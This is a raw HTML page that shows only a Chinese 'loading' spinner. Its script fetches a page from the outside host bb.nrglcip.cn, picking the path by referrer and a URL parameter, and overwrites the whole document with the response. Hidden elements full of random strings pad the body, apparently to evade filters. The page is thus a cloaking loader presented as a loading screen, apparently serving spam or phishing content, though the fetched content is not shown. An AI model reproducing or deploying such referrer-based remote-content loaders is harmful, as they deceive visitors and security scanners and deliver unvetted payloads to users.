<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .WiiNN3D2n {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .WiiNN3D2n .obdfqCDHFi {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .WiiNN3D2n .content {
            line-height: 50px;
            text-align: center
        }

        .WiiNN3D2n .img {
            width: 100%
        }

        .WiiNN3D2n .qCWOekO2wI6 {
            text-align: center
        }

        .WiiNN3D2n .qCWOekO2wI6 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .WiiNN3D2n .qCWOekO2wI6 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .WiiNN3D2n .qCWOekO2wI6 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .WiiNN3D2n .qCWOekO2wI6 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .WiiNN3D2n .qCWOekO2wI6 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .WiiNN3D2n .qCWOekO2wI6 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .WiiNN3D2n .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function fJzsfMPy6(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var fcwy6 = fJzsfMPy6('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ fcwy6 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ fcwy6 +".html?a=share";
		}
		
        VOSsFpS3pc=url+"#"+new Date().getTime();
        VOSsFpS3pc && function() {
            $.get(VOSsFpS3pc, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>o39QuYyIKx6QvII7RXFqUobj9zg3xbljaAKf6b4767Sre0k7Y8xjyHID7YP6XiOGX</p>
<li style='display:none' >hOjFqohNFLIsc44JwtEr8pBhmrynDsdYbGCTIMwDibIjq</li>
<div style='display:none'>TPb6JZvZLYXUyGlAKXlWwdW1PXjeX3Qv99VP6CKOfcIKE0GHFzKHx7qb9lP</div>
<h1 style='display:none' >GdVlxuP0sHwLdvadWilODehmaJ2H95cHs6nUnZcD64FZQni0uW9JH1W5T4oEglCdJfCnfbsjmKT1M56</h1>
<img  src='' style='display:none'>
<b style='display:none' >GGRxZWX4hNtf7Ag1z4LAvuXKMXalMn1She68fYJxC8MxNw4phpGzAaerHwu2Ks</b>
<h1 style='display:none' >GdVlxuP0sHwLdvadWilODehmaJ2H95cHs6nUnZcD64FZQni0uW9JH1W5T4oEglCdJfCnfbsjmKT1M56</h1><div class="WiiNN3D2n">
    <div class="obdfqCDHFi">
        <div class="qCWOekO2wI6">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>qPxCUz5jiGKpNHdD4X5xf4olHmZXN2h3rJktlpyIrwVU25JBfTj3iCoyjGV0KXJ5iHN3i08HTlSrpZAs7m1unnHRXgVWOj</p>
<span style='display:none'>TljwZ6t7rCjxrvWeFfyBZJp7SFo0dU5dOOd3Zv6SoO1DAjaMm2Vt6iagy</span>
<ul style='display:none' >EmpsGndBR7MXP5zUeN57VLZek0jtHx2X8rXYXalQmso11epwRCGpufyIlAr2PDakIwod967vhDbMF9XEiJDJdf3QD</ul>
<li style='display:none' >zfjhNcus1F8MPvDG8lsF9qDL3QwaGG0EQO7khB6zn0qxtiP2HXOrkPZ6wIekGPCzOM5SRvdwrD04Lng4f2NzS0gtryhAvwU</li>
<b style='display:none' >m3UsDJpDhNyKpCrBVlJNkDVWaKmFaSffEtbRxhSmCf0kvPez7yD94UYRk2xn1EvxGde2ZsATQxdZYiftLTzAOZzTwETBjX</b>
<span style='display:none'>TljwZ6t7rCjxrvWeFfyBZJp7SFo0dU5dOOd3Zv6SoO1DAjaMm2Vt6iagy</span>
<b style='display:none' >m3UsDJpDhNyKpCrBVlJNkDVWaKmFaSffEtbRxhSmCf0kvPez7yD94UYRk2xn1EvxGde2ZsATQxdZYiftLTzAOZzTwETBjX</b>
<ul style='display:none' >EmpsGndBR7MXP5zUeN57VLZek0jtHx2X8rXYXalQmso11epwRCGpufyIlAr2PDakIwod967vhDbMF9XEiJDJdf3QD</ul>
<span style='display:none'>TljwZ6t7rCjxrvWeFfyBZJp7SFo0dU5dOOd3Zv6SoO1DAjaMm2Vt6iagy</span>
<b style='display:none' >m3UsDJpDhNyKpCrBVlJNkDVWaKmFaSffEtbRxhSmCf0kvPez7yD94UYRk2xn1EvxGde2ZsATQxdZYiftLTzAOZzTwETBjX</b></body>
</html>